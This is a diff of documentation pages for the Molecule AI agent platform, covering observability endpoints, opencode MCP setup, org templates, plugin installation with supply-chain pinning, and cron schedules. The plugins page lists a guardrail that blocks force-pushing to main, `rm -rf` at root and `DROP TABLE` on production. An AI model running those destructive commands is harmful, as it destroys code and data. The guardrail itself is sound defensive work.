"architecture",
"org-template",
"plugins",
"channels",
"schedules",
"external-agents",
"tokens",
"api-reference",
"mcp-server",
"self-hosting",
"self-hosting/admin-token",
"observability",
"troubleshooting",
"---Security---",
"security/index",
"security/safe-mcp-advisory",
"security/owasp-agentic-top-10",
"---Runtimes---",
"google-adk",
"hermes",
"---Integrations---",
"opencode"
]
}

View File

@ -0,0 +1,180 @@
---
title: Observability
description: Monitor agent activity, LLM traces, and platform health.
---
## Overview
Molecule AI provides multiple layers of observability -- from real-time WebSocket events on the canvas to structured activity logs, LLM traces, Prometheus metrics, and admin health endpoints.
## Activity Logs
Every significant action in the platform is recorded in the `activity_logs` table. Query logs for a specific workspace:
```
GET /workspaces/:id/activity
```
Activity types include:
- **A2A communications** -- request/response capture with duration and method
- **Task updates** -- agent-reported task status changes
- **Agent logs** -- structured log entries from workspace runtimes
- **Errors** -- failures with `error_detail` for debugging
Filter by source to separate user-agent chat (`source=canvas`) from agent-to-agent traffic (`source=agent`).
Activity logs are automatically cleaned up based on `ACTIVITY_RETENTION_DAYS` (default 7). The cleanup job runs every `ACTIVITY_CLEANUP_INTERVAL_HOURS` (default 6).
## LLM Traces
Molecule AI integrates with [Langfuse](https://langfuse.com) for LLM observability. Langfuse runs as part of the infrastructure stack on port 3001, backed by ClickHouse for efficient trace storage.
View traces for a specific workspace:
```
GET /workspaces/:id/traces
```
The Langfuse UI at `http://localhost:3001` provides:
- Token usage and cost tracking per workspace
- Latency breakdowns for LLM calls
- Prompt/completion pairs for debugging
- Trace timelines showing multi-step agent reasoning
## Prometheus Metrics
The platform exposes Prometheus-format metrics at:
```
GET /metrics
```
This endpoint requires no authentication and is safe to scrape. Metrics are in Prometheus text format (v0.0.4) and include:
- Request counts by method, path, and status code
- Request latency histograms
- Active WebSocket connections
- Workspace status counts
Configure your Prometheus instance to scrape `http://localhost:8080/metrics` at your preferred interval.
## Per-Workspace Token Metrics
Track LLM token consumption per workspace — input tokens, output tokens, and Anthropic prompt-cache reads/writes — aggregated over two rolling windows:
```
GET /workspaces/:id/metrics
```
Requires a **workspace bearer token** (`Authorization: Bearer <token>`). Returns:
```json
{
"workspace_id": "uuid",
"token_metrics": {
"1h": {
"input_tokens": 1250,
"output_tokens": 430,
"cache_read_tokens": 800,
"cache_write_tokens": 200
},
"30d": {
"input_tokens": 84200,
"output_tokens": 28100,
"cache_read_tokens": 52000,
"cache_write_tokens": 9400
}
}
}
```
| Field | Description |
|-------|-------------|
| `input_tokens` | Tokens in the prompt sent to the LLM (sum over window) |
| `output_tokens` | Tokens in the completion returned by the LLM |
| `cache_read_tokens` | Prompt tokens served from Anthropic's prompt cache |
| `cache_write_tokens` | Prompt tokens written into Anthropic's prompt cache |
The **canvas WorkspaceUsage panel** (⊞ icon → Usage tab) displays these same metrics live, updating each time the workspace reports a heartbeat.
## Admin Liveness
The liveness endpoint reports the health of every supervised subsystem:
```
GET /admin/liveness
```
This endpoint requires `AdminAuth` (bearer token). It returns a `supervised.Snapshot()` for each subsystem with ages -- how long since each subsystem last reported healthy. Use this to debug stuck schedulers, stalled heartbeat goroutines, or unresponsive health sweeps before diving into logs.
## WebSocket Events
The canvas receives real-time updates via WebSocket at `/ws`. Every state change in the platform is broadcast to connected clients:
| Event | Trigger |
|-------|---------|
| `WORKSPACE_ONLINE` | Workspace registers successfully |
| `WORKSPACE_OFFLINE` | Heartbeat TTL expires or health sweep detects dead container |
| `WORKSPACE_DEGRADED` | Error rate exceeds threshold |
| `WORKSPACE_RECOVERED` | Error rate drops back to normal |
| `WORKSPACE_REMOVED` | Workspace deleted |
| `HEARTBEAT` | Periodic heartbeat from workspace |
| `A2A_RESPONSE` | Agent-to-agent message received |
| `AGENT_MESSAGE` | Agent pushes a message to the user |
Events flow through Redis pub/sub to ensure all platform instances broadcast consistently.
## Structure Events
The `structure_events` table is an append-only audit log of every structural change in the platform. Each event is:
1. Inserted into the database via `broadcaster.RecordAndBroadcast()`
2. Published to Redis pub/sub
3. Relayed to WebSocket clients
Query events for a specific workspace or globally:
```
GET /events/:workspaceId # Workspace-specific
GET /events # All events
```
Both endpoints require `AdminAuth`.
## Session Search
Search through chat history for a workspace:
```
GET /workspaces/:id/session-search?q=deployment+error
```
This searches across both user-agent conversations and agent-to-agent A2A traffic stored in the activity logs.
## Current Task Visibility
Each workspace reports its current task via heartbeat. This is visible in two places:
- **Canvas node** -- the workspace card on the canvas shows the current task text
- **Heartbeat data** -- `GET /registry/discover/:id` includes `current_task` in the workspace info
When `active_tasks` drops to zero, the current task field clears and the idle loop (if configured) begins its countdown.
## Schedule Run History
For workspaces with cron schedules, inspect past runs:
```
GET /workspaces/:id/schedules/:scheduleId/history
```
Each history entry includes:
- Execution timestamp
- Status (`success`, `failed`, `skipped`)
- Duration
- `error_detail` when the run failed (populated by `scheduler.fireSchedule`)
A status of `skipped` means the workspace was busy (active tasks > 0) when the schedule fired and the concurrency-aware scheduler chose not to queue the prompt.

165
content/docs/opencode.mdx Normal file
View File

@ -0,0 +1,165 @@
---
title: opencode Integration
description: Use opencode as an AI coding agent connected to your Molecule AI workspace via remote MCP.
---
## Overview
[opencode](https://opencode.ai) is an AI coding agent that supports remote MCP
servers via `opencode.json`. With Molecule AI's MCP bridge you can wire opencode
directly to your workspace — giving it the full A2A tool surface
(`delegate_task`, `list_peers`, `recall_memory`, and more) over a standard
`Authorization: Bearer` connection.
```
opencode (terminal)
↕ opencode.json declares remote MCP
Molecule AI MCP endpoint
↕ WorkspaceAuth middleware
Your workspace agent
```
---
## Prerequisites
- A running Molecule AI platform (`MOLECULE_MCP_URL` — e.g. `https://api.molecule.ai`)
- A workspace-scoped bearer token (`MOLECULE_MCP_TOKEN`) issued via the platform API (see [Token Management](/docs/tokens))
---
## 1. Declare Molecule as a remote MCP server
Create (or extend) `opencode.json` in your project root:
```json
{
"mcpServers": {
"molecule": {
"type": "remote",
"url": "${MOLECULE_MCP_URL}/workspaces/${WORKSPACE_ID}/mcp",
"headers": { "Authorization": "Bearer ${MOLECULE_MCP_TOKEN}" },
"description": "Molecule AI A2A orchestration — delegate_task, list_peers, check_task_status"
}
}
}
```
> ⚠️ **Never embed the token in the URL** (e.g. `?token=…`). Always use the
> `Authorization: Bearer` header — URL-embedded tokens appear in server logs,
> browser history, and Git history if the file is committed.
A pre-configured template is available in
`org-templates/molecule-dev/opencode.json` in the monorepo.
---
## 2. Obtain a workspace-scoped token
```bash
curl -X POST $MOLECULE_MCP_URL/workspaces/$WORKSPACE_ID/tokens \
-H "Authorization: Bearer $ADMIN_TOKEN" \
-H "Content-Type: application/json" \
-d '{"name": "opencode-agent", "scopes": ["mcp:read", "mcp:delegate"]}'
```
Store the returned token as `MOLECULE_MCP_TOKEN` in your `.env`.
See [Token Management](/docs/tokens) for rotation, revocation, and auditing.
---
## 3. Available tools
When opencode connects to the Molecule MCP endpoint the agent gains access to:
| Tool | Description |
|------|-------------|
| `list_peers` | Discover available workspaces in your org |
| `delegate_task` | Send a task to a peer workspace and wait for the result |
| `delegate_task_async` | Fire-and-forget task delegation; returns a `task_id` |
| `check_task_status` | Poll an async delegation by `task_id` |
| `commit_memory` | Persist information to `LOCAL` or `TEAM` memory scope |
| `recall_memory` | Search previously committed memories |
### Restricted tools
- **`send_message_to_user`** — disabled for remote MCP callers by default. Enable
with `MOLECULE_MCP_ALLOW_SEND_MESSAGE=true` in your platform env.
- **`GLOBAL` memory scope** — `commit_memory` with `scope: GLOBAL` is blocked for
external agents. `LOCAL` and `TEAM` scopes are always available.
---
## 4. Example: delegate a research task
Once connected, opencode can call Molecule tools directly in its tool loop:
```json
{
"tool": "delegate_task",
"arguments": {
"target": "research-lead",
"task": "Summarise the last 7 days of commits in Molecule-AI/molecule-monorepo"
}
}
```
The platform routes the task to your `research-lead` workspace and streams the
response back to opencode.
---
## 5. Two transports
The MCP endpoint supports two transports — opencode auto-selects:
| Transport | Endpoint | Notes |
|-----------|----------|-------|
| Streamable HTTP (primary) | `POST /workspaces/:id/mcp` | MCP 2025-03-26, recommended |
| SSE (backwards compat) | `GET /workspaces/:id/mcp/stream` | Legacy clients |
---
## 6. Security notes
### Org topology exposure (SAFE-T1401)
`list_peers` returns the full set of workspace names and roles visible to your
workspace. Any opencode agent with a valid `MOLECULE_MCP_TOKEN` can enumerate
your org topology. Issue tokens to only the workspaces that need peer visibility.
### Tool surface audit (SAFE-T1201)
The full `@molecule-ai/mcp-server` package exposes additional tools beyond those
listed above. A complete SAFE-T1201 audit is in progress. **Until that audit
completes, do not expose the MCP server to untrusted external agents in
production.**
### Token scoping
Issue tokens with the minimum required scopes (`mcp:read`, `mcp:delegate`).
Rotate tokens regularly. Revoke via `DELETE /workspaces/:id/tokens/:token_id`.
---
## 7. Environment variables
Add to your `.env`:
```bash
MOLECULE_MCP_URL=https://api.molecule.ai # or http://localhost:8080 for local dev
MOLECULE_MCP_TOKEN= # workspace-scoped bearer token (step 2)
WORKSPACE_ID= # UUID of the workspace opencode acts as
# find it in the Canvas sidebar or GET /workspaces
```
See `.env.example` in the monorepo for the full canonical reference.
---
## Related
- [MCP Server](/docs/mcp-server) — full tool catalogue for the `@molecule-ai/mcp-server` package
- [Token Management](/docs/tokens) — issue, rotate, and revoke workspace tokens
- [External Agents](/docs/external-agents) — register any HTTP agent as a first-class workspace

View File

@ -0,0 +1,166 @@
---
title: Org Templates
description: Deploy entire multi-workspace organizations from a single YAML file.
---
## Overview
Org templates let you define an entire agent organization -- hierarchy of workspaces with roles, configurations, and relationships -- in a single YAML file. Import one template and the platform provisions every workspace, wires parent-child relationships, seeds schedules, and installs plugins automatically.
## YAML Structure
A minimal org template looks like this:
```yaml
org_name: molecule-dev
defaults:
runtime: claude-code
tier: 2
plugins:
- molecule-dev
- molecule-careful-bash
workspaces:
pm:
name: Project Manager
role: PM
tier: 3
children:
dev-lead:
name: Dev Lead
children:
backend:
name: Backend Engineer
frontend:
name: Frontend Engineer
marketing:
name: Marketing Specialist
runtime: langgraph
```
The `workspaces` map defines the hierarchy. Each key becomes the workspace's slug. Nesting under `children` sets the parent-child relationship automatically.
## Workspace Fields
Each workspace entry supports the following fields:
| Field | Type | Description |
|-------|------|-------------|
| `name` | string | Display name shown on the canvas |
| `role` | string | Agent role (e.g. PM, Engineer, Researcher) |
| `runtime` | string | Runtime adapter (`claude-code`, `langgraph`, `crewai`, etc.) |
| `tier` | integer | Resource tier (2 = Standard, 3 = Privileged, 4 = Full-host) |
| `workspace_dir` | string | Host path for `/workspace` bind-mount |
| `plugins` | list | Plugins to install on this workspace |
| `initial_prompt` | string | Prompt auto-executed after A2A server is ready |
| `idle_prompt` | string | Prompt fired periodically while workspace is idle |
| `idle_interval_seconds` | integer | Interval for idle prompt (default 600, minimum 60) |
| `channels` | list | Social channel integrations (Telegram, Slack, etc.) |
| `schedules` | list | Cron schedules seeded on import |
| `x` | number | Canvas X coordinate |
| `y` | number | Canvas Y coordinate |
| `children` | map | Nested child workspaces |
## Defaults Layer
The `defaults` block sets baseline values for every workspace in the template. Per-workspace fields override defaults when specified.
**Plugin merging is additive.** Per-workspace `plugins` lists UNION with `defaults.plugins` (deduplicated, defaults first) -- they do not replace them. To opt a specific default plugin out for a given workspace, prefix the plugin name with `!` or `-`:
```yaml
defaults:
plugins:
- molecule-dev
- molecule-careful-bash
- browser-automation
workspaces:
backend:
name: Backend Engineer
plugins:
- molecule-skill-code-review # added
- "!browser-automation" # opted out of default
```
In this example, the backend workspace gets `molecule-dev`, `molecule-careful-bash`, and `molecule-skill-code-review` -- but not `browser-automation`.
## Template Registry
Five org templates live in standalone repos under the `Molecule-AI` GitHub organization:
| Template | Repo |
|----------|------|
| molecule-dev | `Molecule-AI/molecule-ai-org-template-molecule-dev` |
| marketing-team | `Molecule-AI/molecule-ai-org-template-marketing-team` |
| research-lab | `Molecule-AI/molecule-ai-org-template-research-lab` |
| startup-mvp | `Molecule-AI/molecule-ai-org-template-startup-mvp` |
| enterprise-ops | `Molecule-AI/molecule-ai-org-template-enterprise-ops` |
These are cloned into the platform image at Docker build time and registered in the `template_registry` database table.
## Importing an Org Template
### Via API
```bash
curl -X POST http://localhost:8080/org/import \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $TOKEN" \
-d '{"dir": "molecule-dev"}'
```
The `POST /org/import` endpoint requires `AdminAuth` (bearer token). The `dir` field references a template directory name from the registry.
### Via Canvas
Open the template browser in the canvas sidebar and select an org template. The UI calls the same API endpoint.
## Initial Prompts
Workspaces can auto-execute a prompt on startup before any user interaction. Set `initial_prompt` as an inline string or point `initial_prompt_file` to a path relative to the config directory.
After the A2A server is ready, the runtime sends the prompt as a `message/send` to itself. A `.initial_prompt_done` marker file prevents re-execution on restart.
**Important:** Initial prompts must NOT send A2A messages (`delegate_task`, `send_message_to_user`) because other agents may not be ready yet. Keep them local: clone a repo, read docs, save to memory, wait for tasks.
Org templates support `initial_prompt` on both `defaults` (all agents) and per-workspace (overrides default).
## Idle Loop
The idle loop is an opt-in pattern for workspaces that should do periodic background work when they have no active tasks.
When `idle_prompt` is non-empty in the workspace config, the runtime self-sends the prompt every `idle_interval_seconds` (default 600) while `heartbeat.active_tasks == 0`. The fire timeout clamps to `max(60, min(300, idle_interval_seconds))`.
Set per-workspace or as an org template default:
```yaml
defaults:
idle_prompt: "Check for new issues and update your task list."
idle_interval_seconds: 300
```
The idle check is local (no LLM call) and the prompt only fires when there is genuinely nothing to do, so LLM cost stays effectively event-driven rather than scaling with the polling interval.
## Canvas Positioning
Use `x` and `y` fields to control where workspaces appear on the drag-and-drop canvas after import:
```yaml
workspaces:
pm:
name: Project Manager
x: 400
y: 100
children:
dev:
name: Developer
x: 200
y: 300
researcher:
name: Researcher
x: 600
y: 300
```
If coordinates are omitted, the canvas auto-layouts new workspaces.

388
content/docs/plugins.mdx Normal file
View File

@ -0,0 +1,388 @@
---
title: Plugins
description: Extend workspace capabilities with modular plugins — guardrails, skills, workflows.
---
## Overview
Plugins are installable capability bundles that extend what a workspace can do.
They range from ambient guardrails that enforce rules automatically, to
on-demand skills invoked via the `Skill` tool, to workflow plugins that
compose skills into slash commands.
Plugins follow a **two-axis model**: the *source* (where the plugin comes from)
is orthogonal to the *shape* (what format it takes). This means you can install
a plugin from a local registry or from GitHub, and the workspace runtime
figures out how to load it based on its shape.
---
## Two-Axis Model
### Sources (where)
| Scheme | Description | Example |
|--------|-------------|---------|
| `local://` | Platform's curated plugin registry (auto-discovered from the `plugins/` directory) | `local://molecule-careful-bash` |
| `github://` (pinned) | GitHub repo at a specific tag or commit SHA — **required for all installs** | `github://owner/repo#v1.2.0` |
| `github://` (SHA) | Pin to an exact immutable commit | `github://owner/repo#abc1234` |
Use `GET /plugins/sources` to list all registered install-source schemes at
runtime.
### Shapes (what)
| Shape | Description |
|-------|-------------|
| agentskills.io format | `SKILL.md` + optional scripts, hooks, and `plugin.yaml` manifest |
| MCP server | Model Context Protocol server (coming soon for more runtimes) |
The shape is orthogonal to the source. A `github://` plugin and a `local://`
plugin can both be agentskills.io format. The per-runtime adapter inside the
workspace handles loading at startup.
---
## Installing a Plugin
```bash
curl -X POST http://localhost:8080/workspaces/{id}/plugins \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{"source": "local://molecule-careful-bash"}'
```
From GitHub (pinned ref required):
```bash
curl -X POST http://localhost:8080/workspaces/{id}/plugins \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{"source": "github://Molecule-AI/molecule-plugin-careful-bash#v1.0.0"}'
```
<Callout type="warn">
**Pinned refs are required.** `github://owner/repo` without a `#tag` or `#sha` suffix returns **HTTP 422 Unprocessable Entity**. Always pin to a specific tag (e.g. `#v1.0.0`) or commit SHA (e.g. `#abc1234`). See [Supply Chain Security](#supply-chain-security) for details and the escape hatch.
</Callout>
The platform resolves the source, stages the plugin files, copies them into the
workspace container at `/configs/plugins/<name>/`, and triggers an automatic
workspace restart so the runtime picks up the new plugin.
---
## Uninstalling a Plugin
```bash
curl -X DELETE http://localhost:8080/workspaces/{id}/plugins/{name} \
-H "Authorization: Bearer {token}"
```
Uninstall removes the plugin directory, cleans up copied skill directories and
rule markers from `CLAUDE.md`, and triggers an automatic workspace restart.
---
## Listing Plugins
### Platform Registry
List all available plugins in the platform registry:
```bash
# All plugins
curl http://localhost:8080/plugins
# Filtered by runtime
curl http://localhost:8080/plugins?runtime=claude-code
```
Plugins with no declared `runtimes` field in their manifest are treated as
"unspecified, try it" and included in filtered results.
### Available for a Workspace
Returns plugins filtered to those supported by the workspace's current runtime:
```bash
curl http://localhost:8080/workspaces/{id}/plugins/available \
-H "Authorization: Bearer {token}"
```
### Installed on a Workspace
```bash
curl http://localhost:8080/workspaces/{id}/plugins \
-H "Authorization: Bearer {token}"
```
Each installed plugin is annotated with whether it still supports the
workspace's current runtime. This lets the canvas grey out plugins that went
inert after a runtime change.
---
## Runtime Compatibility Check
Before changing a workspace's runtime, check which installed plugins would
become incompatible:
```bash
curl "http://localhost:8080/workspaces/{id}/plugins/compatibility?runtime=langgraph" \
-H "Authorization: Bearer {token}"
```
Response:
```json
{
"target_runtime": "langgraph",
"compatible": [...],
"incompatible": [...],
"all_compatible": false
}
```
The canvas uses this to show a confirmation dialog before applying a runtime
change.
---
## Built-in Plugins
### Hook Plugins (ambient enforcement)
These fire automatically via the harness layer. No explicit invocation needed.
| Plugin | Purpose |
|--------|---------|
| `molecule-careful-bash` | Refuses `git push --force` to main, `rm -rf` at root, `DROP TABLE` against prod schema. Ships the `careful-mode` skill as documentation. |
| `molecule-freeze-scope` | Locks edits to a single path glob via `.claude/freeze`. Useful while debugging. |
| `molecule-audit-trail` | Appends every Edit/Write to `.claude/audit.jsonl` for accountability. |
| `molecule-session-context` | Auto-loads recent cron-learnings and open PR/issue counts at session start. |
| `molecule-prompt-watchdog` | Injects warning context when the prompt mentions destructive keywords. |
### Skill Plugins (on-demand)
Invoked explicitly via the `Skill` tool during a conversation.
| Plugin | Purpose |
|--------|---------|
| `molecule-skill-code-review` | 16-criteria multi-axis code review rubric. |
| `molecule-skill-cross-vendor-review` | Adversarial second-model review for noteworthy PRs. |
| `molecule-skill-llm-judge` | Score whether a deliverable addresses the original request. |
| `molecule-skill-update-docs` | Sync repo docs after merges. |
| `molecule-skill-cron-learnings` | Defines the operational-memory JSONL format. |
### Workflow Plugins (slash commands)
Compose skills into repeatable multi-step workflows.
| Plugin | Command | Purpose |
|--------|---------|---------|
| `molecule-workflow-triage` | `/triage` | Full PR-triage cycle (gates 1-7 + code-review + merge if green). |
| `molecule-workflow-retro` | `/retro` | Weekly retrospective issue. |
### Shared Plugins
Loaded by default from the `plugins/` directory at the repo root.
| Plugin | Purpose |
|--------|---------|
| `molecule-dev` | Codebase conventions (rules injected into CLAUDE.md) + `review-loop` skill. |
| `superpowers` | `verification-before-completion`, `test-driven-development`, `systematic-debugging`, `writing-plans`. |
| `ecc` | General Claude Code guardrails. |
| `browser-automation` | Puppeteer/CDP-based web scraping and live canvas screenshots. Opt-in per workspace. |
### Platform Opt-in Plugins
Available in the platform registry (`local://`) but not installed by default.
Add them per workspace or as org defaults as needed.
| Plugin | Tools | Requires | Purpose |
|--------|-------|----------|---------|
| `molecule-medo` | `create_medo_app`, `update_medo_app`, `publish_medo_app` | `MEDO_API_KEY` secret | Baidu MeDo app builder integration — create, update, and publish MeDo mini-apps from within an agent. |
#### Installing molecule-medo
```bash
# 1. Set your API key
curl -X POST http://localhost:8080/workspaces/{id}/secrets \
-H "Authorization: Bearer {token}" \
-H "Content-Type: application/json" \
-d '{"key": "MEDO_API_KEY", "value": "your-medo-api-key"}'
# 2. Install the plugin (triggers auto-restart)
curl -X POST http://localhost:8080/workspaces/{id}/plugins \
-H "Authorization: Bearer {token}" \
-H "Content-Type: application/json" \
-d '{"source": "local://molecule-medo"}'
```
Or add it to `org.yaml`:
```yaml
workspaces:
- name: App Builder
plugins: [molecule-medo]
secrets:
MEDO_API_KEY: "${MEDO_API_KEY}"
```
---
## Org Template Plugin Resolution
When deploying an org template, per-workspace `plugins:` lists in `org.yaml`
role overrides **UNION** with `defaults.plugins` (deduplicated, defaults first).
They do not replace them.
To opt a specific default out for a given role or workspace, prefix the plugin
name with `!` or `-`:
```yaml
defaults:
plugins:
- molecule-careful-bash
- molecule-audit-trail
- superpowers
workspaces:
researcher:
role: "Research Analyst"
plugins:
- browser-automation # added on top of defaults
- "!superpowers" # opted out of superpowers
```
Result for the `researcher` workspace:
`molecule-careful-bash`, `molecule-audit-trail`, `browser-automation`
---
## Install Safeguards
Environment variables that bound the cost and security of a single plugin install:
| Variable | Default | Description |
|----------|---------|-------------|
| `PLUGIN_INSTALL_BODY_MAX_BYTES` | `65536` (64 KiB) | Max request body size |
| `PLUGIN_INSTALL_FETCH_TIMEOUT` | `5m` | Whole fetch + copy deadline |
| `PLUGIN_INSTALL_MAX_DIR_BYTES` | `104857600` (100 MiB) | Max staged-tree size |
| `PLUGIN_ALLOW_UNPINNED` | _(unset)_ | Set to `true` to allow bare `github://owner/repo` refs without a tag or SHA. **Development use only — never set in production.** |
These prevent a slow or malicious source from tying up a handler goroutine or
exhausting disk space.
---
## Supply Chain Security
The platform enforces two controls to protect against compromised or tampered plugin sources (SAFE-T1102):
### 1. Pinned refs (enforced)
All `github://` installs must include a `#tag` or `#sha` suffix. This ensures the code you audit is exactly what gets installed — a push to the same branch cannot silently swap in different code between your review and a workspace restart.
```
✅ github://Molecule-AI/my-plugin#v1.2.3 (semver tag)
✅ github://Molecule-AI/my-plugin#abc1234def (commit SHA)
❌ github://Molecule-AI/my-plugin (→ HTTP 422)
```
To bypass during local development, set `PLUGIN_ALLOW_UNPINNED=true` in your platform environment. **Do not set this in production.**
### 2. SHA-256 content integrity (optional)
When installing from GitHub, you can provide an expected SHA-256 hash of the staged plugin tree. The platform verifies the hash before completing the install — a mismatch aborts with HTTP 422 and cleans up the staging directory.
```bash
curl -X POST http://localhost:8080/workspaces/{id}/plugins \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{
"source": "github://Molecule-AI/my-plugin#v1.2.3",
"sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
}'
```
**How the hash is computed:** Walk all non-manifest files in the staged plugin tree, sort by relative path, concatenate as `<rel-path>\x00<content>`, and compute `sha256.Sum256`. The hash is lowercase hex.
You can pre-compute the expected hash from a clean checkout:
```bash
# In a clean clone of the plugin repo at the target ref:
find . -type f ! -name 'manifest.json' | sed 's|^\./||' | sort | \
  xargs -I{} sh -c 'printf "%s\0" "{}" && cat "{}"' | sha256sum
```
---
## Plugin Download (External Workspaces)
External workspaces (those running outside Docker) can pull plugins as gzipped
tarballs:
```bash
curl http://localhost:8080/workspaces/{id}/plugins/{name}/download \
-H "Authorization: Bearer {token}" \
-o plugin.tar.gz
```
An optional `?source=github://owner/repo` query parameter lets external
workspaces pull from upstream repos without the platform pre-staging them.
Defaults to `local://<name>` when omitted.
---
## Org-Level Plugin Governance
Tenant admins can restrict which plugins workspaces in their org are permitted to load using a per-org allowlist. When an allowlist is configured, workspaces can only install plugins explicitly listed — all other installs are blocked at load time.
### Managing the allowlist
```bash
# Allow a plugin in the org
curl -X POST http://localhost:8080/admin/orgs/{orgId}/plugins/allowlist \
-H "Authorization: Bearer <admin-token>" \
-H "Content-Type: application/json" \
-d '{"plugin_name": "molecule-audit-trail"}'
# Remove a plugin from the allowlist
curl -X DELETE http://localhost:8080/admin/orgs/{orgId}/plugins/allowlist/molecule-audit-trail \
-H "Authorization: Bearer <admin-token>"
```
Both endpoints require `AdminAuth`. `orgId` is the org's UUID (set via `MOLECULE_ORG_ID` for SaaS tenants; in self-hosted single-org mode this is the org record created at first startup).
### Behaviour when an allowlist is configured
| Scenario | Result |
|----------|--------|
| No allowlist entries for the org | All plugins are permitted (default; backward-compatible) |
| Allowlist has at least one entry | Only listed plugins may be installed; others return `403 Forbidden` |
| Plugin already installed when allowlist was created | Pre-existing installs are not removed, but the plugin cannot be re-installed if later uninstalled |
### Relationship to supply-chain pinning
The governance allowlist and supply-chain pinning (`PLUGIN_ALLOW_UNPINNED`) are independent:
- The **allowlist** controls *which* plugins workspaces can load.
- **Pinning** controls *how* plugins must be referenced (exact commit/tag, never `latest`).
Both can be active simultaneously — the most restrictive rule wins.
---
## API Reference
| Method | Path | Description |
|--------|------|-------------|
| GET | `/plugins` | List plugin registry (supports `?runtime=` filter) |
| GET | `/plugins/sources` | List registered install-source schemes |
| GET | `/workspaces/:id/plugins` | List installed plugins |
| POST | `/workspaces/:id/plugins` | Install a plugin (`{"source": "scheme://spec"}`) |
| DELETE | `/workspaces/:id/plugins/:name` | Uninstall a plugin |
| GET | `/workspaces/:id/plugins/available` | Available plugins filtered by workspace runtime |
| GET | `/workspaces/:id/plugins/compatibility?runtime=X` | Preflight runtime-change compatibility check |
| GET | `/workspaces/:id/plugins/:name/download` | Download plugin as tarball (external workspaces) |
| POST | `/admin/orgs/:orgId/plugins/allowlist` | Add a plugin to the org allowlist (AdminAuth) |
| DELETE | `/admin/orgs/:orgId/plugins/allowlist/:name` | Remove a plugin from the org allowlist (AdminAuth) |

View File

@ -1,3 +1,6 @@
---
title: "Molecule AI plugins and the agentskills.io standard"
---
# Molecule AI plugins and the agentskills.io standard
> **TL;DR** — every skill inside a Molecule AI plugin is a spec-compliant

View File

@ -1,3 +1,6 @@
---
title: "Plugin install sources"
---
# Plugin install sources
> **TL;DR** — plugin **sources** (where a plugin comes from) and plugin

View File

@ -1,3 +1,6 @@
---
title: "Cognee Architecture Deep-Dive — Workspace Isolation"
---
# Cognee Architecture Deep-Dive — Workspace Isolation
**Date:** 2026-04-20

View File

@ -1,3 +1,6 @@
---
title: "Cognee Workspace Isolation Evaluation"
---
# Cognee Workspace Isolation Evaluation
**Date:** 2026-04-20

336
content/docs/schedules.mdx Normal file
View File

@ -0,0 +1,336 @@
---
title: Schedules
description: Run recurring prompts on cron schedules — automated audits, reports, and maintenance.
---
## Overview
Schedules let you run recurring prompts against a workspace on a cron schedule.
Each tick fires an A2A `message/send` into the workspace, so the agent
processes the prompt as if it received a normal message. This enables automated
audits, daily reports, weekly retrospectives, and any other recurring task.
The scheduler polls the `workspace_schedules` table every 30 seconds. When a
schedule's `next_run_at` has passed, the scheduler fires the prompt and
computes the next run time.
```
Scheduler (30s poll) ──> workspace_schedules table
                              next_run_at <= now?
                         ┌─────────┴──────────┐
                         │  A2A message/send  │──> Workspace Agent
                         │  (callerID=system: │
                         │   scheduler)       │
                         └────────────────────┘
```
---
## Creating a Schedule
```bash
curl -X POST http://localhost:8080/workspaces/{id}/schedules \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{
"name": "Daily Security Audit",
"cron_expr": "0 9 * * *",
"timezone": "America/New_York",
"prompt": "Run a security audit of all open PRs. Check for leaked secrets, SQL injection, and auth bypass.",
"enabled": true
}'
```
**Required fields:**
| Field | Type | Description |
|-------|------|-------------|
| `cron_expr` | string | Standard cron expression (5-field: minute, hour, day-of-month, month, day-of-week) |
| `prompt` | string | The text sent to the workspace as an A2A message each tick |
**Optional fields:**
| Field | Type | Default | Description |
|-------|------|---------|-------------|
| `name` | string | `""` | Human-readable label |
| `timezone` | string | `"UTC"` | IANA timezone for cron evaluation (e.g. `America/New_York`, `Asia/Tokyo`) |
| `enabled` | bool | `true` | Whether the schedule fires |
The timezone is validated against Go's `time.LoadLocation` on create and update.
The cron expression is validated and the next run time is computed immediately.
---
## CRUD Operations
| Method | Path | Description |
|--------|------|-------------|
| GET | `/workspaces/:id/schedules` | List all schedules for a workspace |
| POST | `/workspaces/:id/schedules` | Create a new schedule |
| PATCH | `/workspaces/:id/schedules/:scheduleId` | Update a schedule (partial update via COALESCE) |
| DELETE | `/workspaces/:id/schedules/:scheduleId` | Delete a schedule |
### Update
PATCH accepts any subset of fields. Only provided fields are changed — the
handler uses `COALESCE` in SQL so omitted fields retain their current values.
If `cron_expr` or `timezone` changes, the next run time is recomputed.
```bash
curl -X PATCH http://localhost:8080/workspaces/{id}/schedules/{scheduleId} \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{"enabled": false}'
```
### Delete
```bash
curl -X DELETE http://localhost:8080/workspaces/{id}/schedules/{scheduleId} \
-H "Authorization: Bearer {token}"
```
All schedule operations are scoped to the owning workspace ID to prevent IDOR.
---
## Manual Trigger
Fire a schedule immediately, outside its cron cadence:
```bash
curl -X POST http://localhost:8080/workspaces/{id}/schedules/{scheduleId}/run \
-H "Authorization: Bearer {token}"
```
Returns the schedule's prompt so the frontend can POST it to
`/workspaces/:id/a2a`. This keeps the handler stateless.
---
## Run History
View the last 20 runs for a schedule, including error details for failed runs:
```bash
curl http://localhost:8080/workspaces/{id}/schedules/{scheduleId}/history \
-H "Authorization: Bearer {token}"
```
Response:
```json
[
{
"timestamp": "2026-04-16T09:00:02Z",
"duration_ms": 4523,
"status": "success",
"error_detail": "",
"request": {"schedule_id": "...", "prompt": "..."}
},
{
"timestamp": "2026-04-15T09:00:01Z",
"duration_ms": null,
"status": "error",
"error_detail": "A2A proxy returned 503: workspace container not running",
"request": {"schedule_id": "...", "prompt": "..."}
}
]
```
History is pulled from the `activity_logs` table filtered by
`activity_type = 'cron_run'` and the schedule ID in the request body.
---
## Source Field
Each schedule has a `source` field that tracks how it was created:
| Value | Meaning |
|-------|---------|
| `template` | Seeded by an org template import or bundle import. On re-import, only `template`-source rows are refreshed — `runtime` rows survive. |
| `runtime` | Created via the Canvas UI or API. These are user-owned and never overwritten by re-imports. |
---
## Status Values
The `last_status` field on a schedule tracks the outcome of the most recent
run:
| Status | Meaning |
|--------|---------|
